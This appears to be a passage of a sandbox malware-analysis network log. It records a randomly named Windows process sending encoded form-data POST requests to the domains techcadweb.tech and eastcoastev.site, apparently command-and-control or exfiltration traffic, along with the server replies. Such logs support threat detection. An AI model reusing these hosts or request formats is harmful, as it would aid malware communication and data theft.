Aug 2, 2024 13:42:47.191165924 CEST	643	IN	HTTP/1.1 404 Not Found Date: Fri, 02 Aug 2024 11:42:47 GMT Server: Apache Upgrade: h2,h2c Connection: Upgrade, close Last-Modified: Wed, 07 Sep 2022 18:49:41 GMT Accept-Ranges: bytes Vary: Accept-Encoding Content-Encoding: gzip Content-Length: 358 Content-Type: text/html Data Raw: 1f 8b 08 00 00 00 00 00 00 03 8d 52 4b 4f c3 30 0c be ef 57 58 41 93 e0 b0 b6 7b 30 6d 7d 09 21 71 e1 02 37 b8 4d 59 93 b6 5e db 24 4a b2 17 13 ff 9d 74 ad 0a 1c 90 48 a4 c4 ce f7 f9 b3 6c 27 2e 6d 53 a7 a3 b8 e4 94 a5 23 70 2b 36 f6 5c f3 ce 6e 97 57 4b ca b8 86 0b 6c a5 76 46 08 d3 a5 3a 81 91 35 32 b8 c9 e7 ed 8e 7a 6c 62 a5 fa 8d cf 17 eb 15 db 0e b8 a6 0c f7 26 84 fb 60 1c c1 11 99 2d 1d 7d 16 a8 53 04 25 c7 a2 b4 83 4b 05 36 d4 a2 14 21 18 85 02 66 06 6a 14 9c 6a 40 91 a3 40 cb 23 50 d2 60 47 c9 f1 c4 59 04 d7 f4 8b 56 bb e6 b9 ed cd cf a1 94 87 8a 9f 73 4d 1b 6e 3a cd 0b 04 63 77 58 4d 85 c9 a5 6e 42 d0 d2 52 cb 6f 03 c6 8b 3b 17 09 d3 e0 0f c6 7c 39 70 3a fd d8 ff d1 b7 d8 64 1a 95 85 9a 8a 62 4f 0b 9e 90 67 7a a0 dd 23 49 0f ae 88 8d a9 3e 36 ca 75 28 01 b2 7e 7d 79 7c 7a 5f 05 6f 24 72 2a 57 d2 3f 64 c0 e8 2c 21 a5 b5 2a f4 fd 8c 09 6f 67 da b6 78 0c 35 cf 6c 7e 64 5e 26 1b df 54 93 9d 51 54 57 9b 2b a8 4a 45 d2 ef 24 b1 df cd 3d de 4a 76 76 17 c3 03 64 35 35 26 21 dd d4 09 20 4b 88 13 e9 [TRUNCATED] Data Ascii: RKO0WXA{0m}!q7MY^$JtHl'.mS#p+6\nWKlvF:52zlb&`-}S%K6!fjj@@#P`GYVsMn:cwXMnBRo;\|9p:dbOgz#I>6u(~}y\|z_o$rW?d,!ogx5l~d^&TQTW+JE$=Jvvd55&! K]8m`wcG

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
18	192.168.2.4	49755	162.241.148.243	80	5772	C:\Program Files (x86)\DpqmwVdXaJHvnbAwBGUnMowaNTznLLhKbsEmyiPPSdUzRqwv\wEnggOkwNlJAef.exe

Timestamp	Bytes transferred	Direction	Data
Aug 2, 2024 13:42:49.202236891 CEST	805	OUT	POST /14e7/ HTTP/1.1 Host: www.techcadweb.tech Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7 Accept-Language: en-US Accept-Encoding: gzip, deflate, br Origin: http://www.techcadweb.tech Referer: http://www.techcadweb.tech/14e7/ Content-Type: application/x-www-form-urlencoded Connection: close Cache-Control: max-age=0 Content-Length: 224 User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_7_5) AppleWebKit/537.78.2 (KHTML, like Gecko) Version/6.1.6 Safari/537.78.2 Data Raw: 53 58 71 48 30 36 65 3d 57 41 6e 77 36 4a 70 62 66 6e 31 6a 78 72 47 41 63 72 73 6c 59 31 35 76 54 4b 6c 6e 76 78 61 4a 35 52 49 41 4a 6f 57 4b 42 65 75 68 4a 4d 56 76 2b 39 4d 67 48 62 4f 47 45 64 46 57 58 35 53 30 46 4d 6e 31 7a 78 43 59 49 39 47 46 41 41 4f 4c 43 79 37 69 76 4e 79 75 76 5a 54 4b 64 6e 42 44 49 45 58 6a 39 43 73 56 4b 45 49 77 46 45 45 78 6f 5a 55 77 52 76 59 4f 7a 78 6c 43 71 53 75 53 45 4f 68 4a 37 59 52 42 49 2b 39 64 67 6a 59 66 59 30 47 51 4e 62 59 57 41 4b 36 6e 6d 32 43 79 77 55 43 4f 6b 46 55 73 64 32 53 67 6c 4b 6a 79 32 47 48 69 7a 43 77 4a 31 37 41 2f 41 2f 52 66 46 55 61 75 38 62 46 37 44 48 54 45 74 43 58 56 45 74 47 49 37 44 38 3d Data Ascii: SXqH06e=WAnw6Jpbfn1jxrGAcrslY15vTKlnvxaJ5RIAJoWKBeuhJMVv+9MgHbOGEdFWX5S0FMn1zxCYI9GFAAOLCy7ivNyuvZTKdnBDIEXj9CsVKEIwFEExoZUwRvYOzxlCqSuSEOhJ7YRBI+9dgjYfY0GQNbYWAK6nm2CywUCOkFUsd2SglKjy2GHizCwJ17A/A/RfFUau8bF7DHTEtCXVEtGI7D8=
Aug 2, 2024 13:42:49.767559052 CEST	643	IN	HTTP/1.1 404 Not Found Date: Fri, 02 Aug 2024 11:42:49 GMT Server: Apache Upgrade: h2,h2c Connection: Upgrade, close Last-Modified: Wed, 07 Sep 2022 18:49:41 GMT Accept-Ranges: bytes Vary: Accept-Encoding Content-Encoding: gzip Content-Length: 358 Content-Type: text/html Data Raw: 1f 8b 08 00 00 00 00 00 00 03 8d 52 4b 4f c3 30 0c be ef 57 58 41 93 e0 b0 b6 7b 30 6d 7d 09 21 71 e1 02 37 b8 4d 59 93 b6 5e db 24 4a b2 17 13 ff 9d 74 ad 0a 1c 90 48 a4 c4 ce f7 f9 b3 6c 27 2e 6d 53 a7 a3 b8 e4 94 a5 23 70 2b 36 f6 5c f3 ce 6e 97 57 4b ca b8 86 0b 6c a5 76 46 08 d3 a5 3a 81 91 35 32 b8 c9 e7 ed 8e 7a 6c 62 a5 fa 8d cf 17 eb 15 db 0e b8 a6 0c f7 26 84 fb 60 1c c1 11 99 2d 1d 7d 16 a8 53 04 25 c7 a2 b4 83 4b 05 36 d4 a2 14 21 18 85 02 66 06 6a 14 9c 6a 40 91 a3 40 cb 23 50 d2 60 47 c9 f1 c4 59 04 d7 f4 8b 56 bb e6 b9 ed cd cf a1 94 87 8a 9f 73 4d 1b 6e 3a cd 0b 04 63 77 58 4d 85 c9 a5 6e 42 d0 d2 52 cb 6f 03 c6 8b 3b 17 09 d3 e0 0f c6 7c 39 70 3a fd d8 ff d1 b7 d8 64 1a 95 85 9a 8a 62 4f 0b 9e 90 67 7a a0 dd 23 49 0f ae 88 8d a9 3e 36 ca 75 28 01 b2 7e 7d 79 7c 7a 5f 05 6f 24 72 2a 57 d2 3f 64 c0 e8 2c 21 a5 b5 2a f4 fd 8c 09 6f 67 da b6 78 0c 35 cf 6c 7e 64 5e 26 1b df 54 93 9d 51 54 57 9b 2b a8 4a 45 d2 ef 24 b1 df cd 3d de 4a 76 76 17 c3 03 64 35 35 26 21 dd d4 09 20 4b 88 13 e9 [TRUNCATED] Data Ascii: RKO0WXA{0m}!q7MY^$JtHl'.mS#p+6\nWKlvF:52zlb&`-}S%K6!fjj@@#P`GYVsMn:cwXMnBRo;\|9p:dbOgz#I>6u(~}y\|z_o$rW?d,!ogx5l~d^&TQTW+JE$=Jvvd55&! K]8m`wcG

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
19	192.168.2.4	49756	162.241.148.243	80	5772	C:\Program Files (x86)\DpqmwVdXaJHvnbAwBGUnMowaNTznLLhKbsEmyiPPSdUzRqwv\wEnggOkwNlJAef.exe

Timestamp	Bytes transferred	Direction	Data
Aug 2, 2024 13:42:51.783226967 CEST	10887	OUT	POST /14e7/ HTTP/1.1 Host: www.techcadweb.tech Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7 Accept-Language: en-US Accept-Encoding: gzip, deflate, br Origin: http://www.techcadweb.tech Referer: http://www.techcadweb.tech/14e7/ Content-Type: application/x-www-form-urlencoded Connection: close Cache-Control: max-age=0 Content-Length: 10304 User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_7_5) AppleWebKit/537.78.2 (KHTML, like Gecko) Version/6.1.6 Safari/537.78.2 Data Raw: 53 58 71 48 30 36 65 3d 57 41 6e 77 36 4a 70 62 66 6e 31 6a 78 72 47 41 63 72 73 6c 59 31 35 76 54 4b 6c 6e 76 78 61 4a 35 52 49 41 4a 6f 57 4b 42 65 6d 68 4a 2f 74 76 73 4b 59 67 42 72 4f 47 48 64 46 58 58 35 54 73 46 4d 2f 35 7a 78 4f 49 49 34 43 46 42 6a 57 4c 4c 6a 37 69 30 39 79 75 68 4a 54 50 5a 6e 42 7a 49 45 48 76 39 43 63 56 4b 45 49 77 46 46 30 78 73 49 55 77 64 50 59 4a 77 78 6c 65 35 43 75 2b 45 4f 35 5a 37 59 46 37 49 4b 42 64 68 41 67 66 64 47 75 51 41 62 59 55 44 4b 37 30 6d 32 47 74 77 53 6e 31 6b 45 67 47 64 78 69 67 6e 61 6e 71 70 46 2f 2f 6b 78 55 57 31 72 73 4f 62 4e 4a 67 4e 30 58 61 73 5a 4a 45 65 57 66 37 69 53 4b 38 55 49 75 49 35 44 63 31 70 66 55 42 45 79 4b 57 36 72 5a 4c 47 74 2b 59 46 6a 54 76 64 65 71 42 74 74 55 79 46 31 57 4d 42 73 49 4b 64 74 32 62 6e 36 41 4a 6e 55 33 6d 55 47 4b 62 51 32 38 50 42 38 53 6c 31 54 7a 4d 34 67 64 77 4c 4d 5a 4c 42 61 38 54 50 5a 6b 36 6e 64 69 46 45 54 67 6e 30 69 76 42 6d 65 30 65 4c 64 55 73 49 52 72 51 43 31 59 4b 67 67 6f 33 76 79 [TRUNCATED] Data Ascii: SXqH06e=WAnw6Jpbfn1jxrGAcrslY15vTKlnvxaJ5RIAJoWKBemhJ/tvsKYgBrOGHdFXX5TsFM/5zxOII4CFBjWLLj7i09yuhJTPZnBzIEHv9CcVKEIwFF0xsIUwdPYJwxle5Cu+EO5Z7YF7IKBdhAgfdGuQAbYUDK70m2GtwSn1kEgGdxignanqpF//kxUW1rsObNJgN0XasZJEeWf7iSK8UIuI5Dc1pfUBEyKW6rZLGt+YFjTvdeqBttUyF1WMBsIKdt2bn6AJnU3mUGKbQ28PB8Sl1TzM4gdwLMZLBa8TPZk6ndiFETgn0ivBme0eLdUsIRrQC1YKggo3vyz+0qW4upRc41ykU1UoR3+NFSdCXl0sR6vU3V6N/GhJGQKsfSIJwza6Ki9u9eG2VsxzlINl9AYNzGMG8bQ6b5Tw8zxqlDfnTo1Q2ZRN6ojeHX3o4vSbsYj/214tFm51X1Uy+XNp9RX/YzSVYwgUDS9s50F2JhXTAwoqFcOqpuYsgM2t7GcbhiFDng5jDqu6zjIoJ53UqclZXrRyijk0DSOIAroyZDznaoqMICEjazfnbUpmhYRFUppyPcksZR55BzHSkjhsyd9KIUn/+p97uLWSA8LBSiO8lPUWSmETvXa9i2UXFfTFndoh3zQ0UOCoc4MFO+jCpOmsgbJ8ibwI+NkQmYNd5byM1p+XcnXksTs8ssYVhArGjn3Hvdffo9ttYajEmacYhyLih8yrgyjNsWrKAbWSBB11V64Zc4PdGMgjMDlDREM8pmkvO/u0csWx/uR0/lxT8v19Kjk48v5FvLLDmSBQ8eKETQCx9GwYFaAC722/jRCIwXxJeQ4baJm/9sEmRVQdFVybScOtESWFro2G4XBzE7K4vVvt19xRcLfb0Bz7mHlxQSVsYeu+dtiIcsVHC0MrAqRKxsedRYSXUnwHe6xlr/BKY3gkiaLEySB9pCbwMnnC03aL3nattQt29BR8u6UhIhArE3ct8jZKLWfAvc8w9fWpwFSY [TRUNCATED]
Aug 2, 2024 13:42:52.356398106 CEST	643	IN	HTTP/1.1 404 Not Found Date: Fri, 02 Aug 2024 11:42:52 GMT Server: Apache Upgrade: h2,h2c Connection: Upgrade, close Last-Modified: Wed, 07 Sep 2022 18:49:41 GMT Accept-Ranges: bytes Vary: Accept-Encoding Content-Encoding: gzip Content-Length: 358 Content-Type: text/html Data Raw: 1f 8b 08 00 00 00 00 00 00 03 8d 52 4b 4f c3 30 0c be ef 57 58 41 93 e0 b0 b6 7b 30 6d 7d 09 21 71 e1 02 37 b8 4d 59 93 b6 5e db 24 4a b2 17 13 ff 9d 74 ad 0a 1c 90 48 a4 c4 ce f7 f9 b3 6c 27 2e 6d 53 a7 a3 b8 e4 94 a5 23 70 2b 36 f6 5c f3 ce 6e 97 57 4b ca b8 86 0b 6c a5 76 46 08 d3 a5 3a 81 91 35 32 b8 c9 e7 ed 8e 7a 6c 62 a5 fa 8d cf 17 eb 15 db 0e b8 a6 0c f7 26 84 fb 60 1c c1 11 99 2d 1d 7d 16 a8 53 04 25 c7 a2 b4 83 4b 05 36 d4 a2 14 21 18 85 02 66 06 6a 14 9c 6a 40 91 a3 40 cb 23 50 d2 60 47 c9 f1 c4 59 04 d7 f4 8b 56 bb e6 b9 ed cd cf a1 94 87 8a 9f 73 4d 1b 6e 3a cd 0b 04 63 77 58 4d 85 c9 a5 6e 42 d0 d2 52 cb 6f 03 c6 8b 3b 17 09 d3 e0 0f c6 7c 39 70 3a fd d8 ff d1 b7 d8 64 1a 95 85 9a 8a 62 4f 0b 9e 90 67 7a a0 dd 23 49 0f ae 88 8d a9 3e 36 ca 75 28 01 b2 7e 7d 79 7c 7a 5f 05 6f 24 72 2a 57 d2 3f 64 c0 e8 2c 21 a5 b5 2a f4 fd 8c 09 6f 67 da b6 78 0c 35 cf 6c 7e 64 5e 26 1b df 54 93 9d 51 54 57 9b 2b a8 4a 45 d2 ef 24 b1 df cd 3d de 4a 76 76 17 c3 03 64 35 35 26 21 dd d4 09 20 4b 88 13 e9 [TRUNCATED] Data Ascii: RKO0WXA{0m}!q7MY^$JtHl'.mS#p+6\nWKlvF:52zlb&`-}S%K6!fjj@@#P`GYVsMn:cwXMnBRo;\|9p:dbOgz#I>6u(~}y\|z_o$rW?d,!ogx5l~d^&TQTW+JE$=Jvvd55&! K]8m`wcG

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
20	192.168.2.4	49757	162.241.148.243	80	5772	C:\Program Files (x86)\DpqmwVdXaJHvnbAwBGUnMowaNTznLLhKbsEmyiPPSdUzRqwv\wEnggOkwNlJAef.exe

Timestamp	Bytes transferred	Direction	Data
Aug 2, 2024 13:42:54.350157976 CEST	512	OUT	GET /14e7/?SXqH06e=bCPQ5+1rXgIzzb6Yab0pbAhhQb9XrByT/Ak2H+GAO5bcJYJuu6EdQZ+EA6E6dYH2KOSHyjKcRtCqIh6kAwLxr/W5k5rXUDR6Bybr1Ao3GXQhCERrhJ9UbaA=&AV=_ng4uzR8Zz HTTP/1.1 Host: www.techcadweb.tech Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7 Accept-Language: en-US Connection: close User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_7_5) AppleWebKit/537.78.2 (KHTML, like Gecko) Version/6.1.6 Safari/537.78.2
Aug 2, 2024 13:42:55.551388979 CEST	844	IN	HTTP/1.1 404 Not Found Date: Fri, 02 Aug 2024 11:42:54 GMT Server: Apache Upgrade: h2,h2c Connection: Upgrade, close Last-Modified: Wed, 07 Sep 2022 18:49:41 GMT Accept-Ranges: bytes Content-Length: 583 Vary: Accept-Encoding Content-Type: text/html Data Raw: 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 20 20 20 20 2e 6c 6f 61 64 65 72 20 7b 20 62 6f 72 64 65 72 3a 20 31 36 70 78 20 73 6f 6c 69 64 20 23 66 33 66 33 66 33 3b 20 62 6f 72 64 65 72 2d 74 6f 70 3a 20 31 36 70 78 20 73 6f 6c 69 64 20 23 33 34 39 38 64 62 3b 20 62 6f 72 64 65 72 2d 72 61 64 69 75 73 3a 20 35 30 25 3b 20 77 69 64 74 68 3a 20 31 32 30 70 78 3b 20 68 65 69 67 68 74 3a 20 31 32 30 70 78 3b 20 61 6e 69 6d 61 74 69 6f 6e 3a 20 73 70 69 6e 20 32 73 20 6c 69 6e 65 61 72 20 69 6e 66 69 6e 69 74 65 3b 20 70 6f 73 69 74 69 6f 6e 3a 20 66 69 78 65 64 3b 20 74 6f 70 3a 20 34 30 25 3b 20 6c 65 66 74 3a 20 34 30 25 3b 20 7d 0a 20 20 20 20 20 20 20 20 40 6b 65 79 66 72 61 6d 65 73 20 73 70 69 6e 20 7b 20 30 25 20 7b 20 74 72 61 6e 73 66 6f 72 6d 3a 20 72 6f 74 61 74 65 28 30 64 65 67 29 3b 20 7d 20 31 30 30 25 20 7b 20 74 72 61 6e 73 66 6f 72 6d 3a 20 72 6f 74 61 74 65 28 33 36 30 64 65 67 29 3b 20 7d 20 7d 0a 20 20 20 20 3c 2f 73 74 79 6c 65 3e 0a [TRUNCATED] Data Ascii: <html><head> <style> .loader { border: 16px solid #f3f3f3; border-top: 16px solid #3498db; border-radius: 50%; width: 120px; height: 120px; animation: spin 2s linear infinite; position: fixed; top: 40%; left: 40%; } @keyframes spin { 0% { transform: rotate(0deg); } 100% { transform: rotate(360deg); } } </style> <script language="Javascript">var _skz_pid = "9POBEX80W";</script> <script language="Javascript" src="http://cdn.jsinit.directfwd.com/sk-jspark_init.php"></script></head><body><div class="loader" id="sk-loader"></div></body></html>
Aug 2, 2024 13:42:55.554328918 CEST	844	IN	HTTP/1.1 404 Not Found Date: Fri, 02 Aug 2024 11:42:54 GMT Server: Apache Upgrade: h2,h2c Connection: Upgrade, close Last-Modified: Wed, 07 Sep 2022 18:49:41 GMT Accept-Ranges: bytes Content-Length: 583 Vary: Accept-Encoding Content-Type: text/html Data Raw: 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 20 20 20 20 2e 6c 6f 61 64 65 72 20 7b 20 62 6f 72 64 65 72 3a 20 31 36 70 78 20 73 6f 6c 69 64 20 23 66 33 66 33 66 33 3b 20 62 6f 72 64 65 72 2d 74 6f 70 3a 20 31 36 70 78 20 73 6f 6c 69 64 20 23 33 34 39 38 64 62 3b 20 62 6f 72 64 65 72 2d 72 61 64 69 75 73 3a 20 35 30 25 3b 20 77 69 64 74 68 3a 20 31 32 30 70 78 3b 20 68 65 69 67 68 74 3a 20 31 32 30 70 78 3b 20 61 6e 69 6d 61 74 69 6f 6e 3a 20 73 70 69 6e 20 32 73 20 6c 69 6e 65 61 72 20 69 6e 66 69 6e 69 74 65 3b 20 70 6f 73 69 74 69 6f 6e 3a 20 66 69 78 65 64 3b 20 74 6f 70 3a 20 34 30 25 3b 20 6c 65 66 74 3a 20 34 30 25 3b 20 7d 0a 20 20 20 20 20 20 20 20 40 6b 65 79 66 72 61 6d 65 73 20 73 70 69 6e 20 7b 20 30 25 20 7b 20 74 72 61 6e 73 66 6f 72 6d 3a 20 72 6f 74 61 74 65 28 30 64 65 67 29 3b 20 7d 20 31 30 30 25 20 7b 20 74 72 61 6e 73 66 6f 72 6d 3a 20 72 6f 74 61 74 65 28 33 36 30 64 65 67 29 3b 20 7d 20 7d 0a 20 20 20 20 3c 2f 73 74 79 6c 65 3e 0a [TRUNCATED] Data Ascii: <html><head> <style> .loader { border: 16px solid #f3f3f3; border-top: 16px solid #3498db; border-radius: 50%; width: 120px; height: 120px; animation: spin 2s linear infinite; position: fixed; top: 40%; left: 40%; } @keyframes spin { 0% { transform: rotate(0deg); } 100% { transform: rotate(360deg); } } </style> <script language="Javascript">var _skz_pid = "9POBEX80W";</script> <script language="Javascript" src="http://cdn.jsinit.directfwd.com/sk-jspark_init.php"></script></head><body><div class="loader" id="sk-loader"></div></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
21	192.168.2.4	49758	103.42.108.46	80	5772	C:\Program Files (x86)\DpqmwVdXaJHvnbAwBGUnMowaNTznLLhKbsEmyiPPSdUzRqwv\wEnggOkwNlJAef.exe

Timestamp	Bytes transferred	Direction	Data
Aug 2, 2024 13:43:01.282272100 CEST	788	OUT	POST /51n1/ HTTP/1.1 Host: www.eastcoastev.site Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7 Accept-Language: en-US Accept-Encoding: gzip, deflate, br Origin: http://www.eastcoastev.site Referer: http://www.eastcoastev.site/51n1/ Content-Type: application/x-www-form-urlencoded Connection: close Cache-Control: max-age=0 Content-Length: 204 User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_7_5) AppleWebKit/537.78.2 (KHTML, like Gecko) Version/6.1.6 Safari/537.78.2 Data Raw: 53 58 71 48 30 36 65 3d 4c 52 2b 62 6a 36 6a 52 31 48 41 52 68 55 63 44 41 6c 38 6d 78 72 44 35 71 2f 42 71 2f 35 69 45 2f 4a 55 6b 43 4b 31 7a 4d 46 41 73 38 63 57 70 72 47 72 57 45 64 47 73 7a 38 4c 4d 36 79 45 6f 45 36 31 53 67 4f 31 6f 48 74 38 4d 6c 41 45 64 65 39 33 4c 6e 4b 76 66 48 70 7a 41 50 64 47 61 46 4f 4d 6b 65 62 39 70 73 66 35 6c 6c 42 72 61 49 69 41 62 39 42 65 6f 6e 31 6f 7a 75 4c 33 69 50 73 64 38 4f 78 55 30 78 66 4d 38 78 2b 39 72 44 5a 61 6f 4e 68 6d 64 6e 73 2b 76 79 6a 4f 50 58 62 52 74 4f 37 6c 4d 76 31 63 6c 7a 52 58 7a 6c 77 69 6c 41 69 59 63 6a 39 2b 64 77 58 56 6d 51 67 3d 3d Data Ascii: SXqH06e=LR+bj6jR1HARhUcDAl8mxrD5q/Bq/5iE/JUkCK1zMFAs8cWprGrWEdGsz8LM6yEoE61SgO1oHt8MlAEde93LnKvfHpzAPdGaFOMkeb9psf5llBraIiAb9Beon1ozuL3iPsd8OxU0xfM8x+9rDZaoNhmdns+vyjOPXbRtO7lMv1clzRXzlwilAiYcj9+dwXVmQg==
Aug 2, 2024 13:43:02.167483091 CEST	170	IN	HTTP/1.1 405 Method Not Allowed Content-Type: text/plain; charset=utf-8 Date: Fri, 02 Aug 2024 11:43:02 GMT Content-Length: 18 Connection: close Data Raw: 4d 65 74 68 6f 64 20 4e 6f 74 20 41 6c 6c 6f 77 65 64 Data Ascii: Method Not Allowed

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
22	192.168.2.4	49759	103.42.108.46	80	5772	C:\Program Files (x86)\DpqmwVdXaJHvnbAwBGUnMowaNTznLLhKbsEmyiPPSdUzRqwv\wEnggOkwNlJAef.exe

Timestamp	Bytes transferred	Direction	Data
Aug 2, 2024 13:43:03.862335920 CEST	808	OUT	POST /51n1/ HTTP/1.1 Host: www.eastcoastev.site Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7 Accept-Language: en-US Accept-Encoding: gzip, deflate, br Origin: http://www.eastcoastev.site Referer: http://www.eastcoastev.site/51n1/ Content-Type: application/x-www-form-urlencoded Connection: close Cache-Control: max-age=0 Content-Length: 224 User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_7_5) AppleWebKit/537.78.2 (KHTML, like Gecko) Version/6.1.6 Safari/537.78.2 Data Raw: 53 58 71 48 30 36 65 3d 4c 52 2b 62 6a 36 6a 52 31 48 41 52 67 31 73 44 42 47 55 6d 33 4c 44 34 6c 66 42 71 31 5a 69 49 2f 4f 63 6b 43 50 56 5a 4c 32 6b 73 37 35 36 70 6f 45 54 57 55 4e 47 73 35 63 4c 4a 30 53 45 33 45 36 35 30 67 4c 64 6f 48 70 55 4d 6c 45 41 64 65 4d 33 49 6d 61 76 64 50 4a 7a 4f 58 39 47 61 46 4f 4d 6b 65 62 5a 54 73 65 52 6c 6c 78 62 61 48 6d 55 59 6a 52 65 33 6b 31 6f 7a 39 62 33 6d 50 73 64 4b 4f 77 4a 5a 78 64 45 38 78 2f 4e 72 48 59 61 76 59 52 6d 62 6a 73 2f 4d 37 54 37 78 65 4f 38 69 50 4e 31 69 70 48 77 58 32 58 47 70 30 42 44 79 53 69 38 76 2b 36 33 70 39 55 6f 76 4c 6e 45 49 61 4e 4b 51 51 41 4b 4e 68 69 50 31 5a 74 2b 31 35 31 59 3d Data Ascii: SXqH06e=LR+bj6jR1HARg1sDBGUm3LD4lfBq1ZiI/OckCPVZL2ks756poETWUNGs5cLJ0SE3E650gLdoHpUMlEAdeM3ImavdPJzOX9GaFOMkebZTseRllxbaHmUYjRe3k1oz9b3mPsdKOwJZxdE8x/NrHYavYRmbjs/M7T7xeO8iPN1ipHwX2XGp0BDySi8v+63p9UovLnEIaNKQQAKNhiP1Zt+151Y=
Aug 2, 2024 13:43:04.739828110 CEST	170	IN	HTTP/1.1 405 Method Not Allowed Content-Type: text/plain; charset=utf-8 Date: Fri, 02 Aug 2024 11:43:04 GMT Content-Length: 18 Connection: close Data Raw: 4d 65 74 68 6f 64 20 4e 6f 74 20 41 6c 6c 6f 77 65 64 Data Ascii: Method Not Allowed

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
23	192.168.2.4	49760	103.42.108.46	80	5772	C:\Program Files (x86)\DpqmwVdXaJHvnbAwBGUnMowaNTznLLhKbsEmyiPPSdUzRqwv\wEnggOkwNlJAef.exe

Timestamp	Bytes transferred	Direction	Data
Aug 2, 2024 13:43:06.431287050 CEST	10890	OUT	POST /51n1/ HTTP/1.1 Host: www.eastcoastev.site Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7 Accept-Language: en-US Accept-Encoding: gzip, deflate, br Origin: http://www.eastcoastev.site Referer: http://www.eastcoastev.site/51n1/ Content-Type: application/x-www-form-urlencoded Connection: close Cache-Control: max-age=0 Content-Length: 10304 User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_7_5) AppleWebKit/537.78.2 (KHTML, like Gecko) Version/6.1.6 Safari/537.78.2 Data Raw: 53 58 71 48 30 36 65 3d 4c 52 2b 62 6a 36 6a 52 31 48 41 52 67 31 73 44 42 47 55 6d 33 4c 44 34 6c 66 42 71 31 5a 69 49 2f 4f 63 6b 43 50 56 5a 4c 32 73 73 38 50 75 70 76 54 48 57 47 64 47 73 6e 4d 4c 49 30 53 45 2b 45 36 68 34 67 4c 52 65 48 72 63 4d 6b 68 55 64 63 2b 54 49 76 61 76 64 51 35 7a 50 50 64 47 50 46 4f 63 67 65 62 4a 54 73 65 52 6c 6c 33 58 61 4f 53 41 59 6b 68 65 6f 6e 31 6f 2f 75 4c 33 65 50 73 46 61 4f 77 64 76 78 70 49 38 2f 2f 64 72 42 2b 75 76 45 42 6d 5a 74 4d 2f 71 37 54 6e 55 65 4b 63 41 50 4e 70 49 70 47 49 58 37 51 2f 57 6c 31 4c 5a 50 52 38 63 73 61 50 50 30 6c 30 4c 46 56 73 75 56 66 4c 45 55 52 79 42 6d 41 69 42 63 39 2b 71 72 52 6c 42 69 61 6c 6c 61 45 45 51 75 50 6e 75 33 45 38 33 76 4b 37 44 30 30 69 75 35 72 46 56 76 32 4e 6f 68 6c 47 73 35 2f 36 77 56 6f 4d 6c 6c 77 53 5a 47 56 69 4a 5a 64 44 45 32 47 72 45 32 74 6b 57 64 31 4f 4e 2f 49 58 56 47 38 71 6b 37 43 61 4d 44 73 4a 6a 50 32 6f 43 54 51 50 59 48 74 76 34 4a 47 57 35 45 47 53 4b 36 69 62 4a 69 79 54 65 78 38 [TRUNCATED] Data Ascii: SXqH06e=LR+bj6jR1HARg1sDBGUm3LD4lfBq1ZiI/OckCPVZL2ss8PupvTHWGdGsnMLI0SE+E6h4gLReHrcMkhUdc+TIvavdQ5zPPdGPFOcgebJTseRll3XaOSAYkheon1o/uL3ePsFaOwdvxpI8//drB+uvEBmZtM/q7TnUeKcAPNpIpGIX7Q/Wl1LZPR8csaPP0l0LFVsuVfLEURyBmAiBc9+qrRlBiallaEEQuPnu3E83vK7D00iu5rFVv2NohlGs5/6wVoMllwSZGViJZdDE2GrE2tkWd1ON/IXVG8qk7CaMDsJjP2oCTQPYHtv4JGW5EGSK6ibJiyTex8HY6TN/ooP6sGNFUpxjiksvwTw00C4aNzrgG626SEkCEZfZ7+Wfo8KzIqSneBxbUkB4J/GsWjrWF/pOb+YdXvs8SephNKZoyqid0gU37YxEqHMEfOo4FEFasgXMeq706Qx2E3iTVph2A8P7Yl2VIEzBRjFibDORU91rfB2tI6Q2nGgiWubfWHETZwKgevd1veuBIGX8v2w5RJHlzADGtzwRYnbg/5xI0r1qtkTu77rN7MwtsvQMwEENpfPi4gAlgNHk8IkrFN6ZdYo4eqHYMOHQ3BqvyZrW00IRO5SBHLTWxGKcBY2tHLOmLdgAgg567m/68496WOZbOG3Fram/gvc7mSD3elQ80gEcIHhGL+4Ql70NoeW1etNUs1IgwGoz0iSKPdkqrKHc4De9zRg33CK44ZU2NW27oBmfw0UoqDM1hmDSCk4OQ5pox7G/EA3c77UrPScnaizhFGTOPrVZ/GNuVrSehUK9gpBmi71CZFLlkA6MWPg/Sa61Q6edYuAzINbI+HXcp+WjqP9uIhMvu65C6U2BLCQHLAWwaskaClKM8ULJ9gXR46V9dFLvEaiLm32q95zx55eliu1IifVgKllQP+9sOOGNRfZPIPJore4v8B9HsHG7BsMwYkTRWmYSWZWmgr2rThpS7CF4z3lWSlsWPTFpzkJRfEDP [TRUNCATED]

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
24	192.168.2.4	49761	103.42.108.46	80	5772	C:\Program Files (x86)\DpqmwVdXaJHvnbAwBGUnMowaNTznLLhKbsEmyiPPSdUzRqwv\wEnggOkwNlJAef.exe

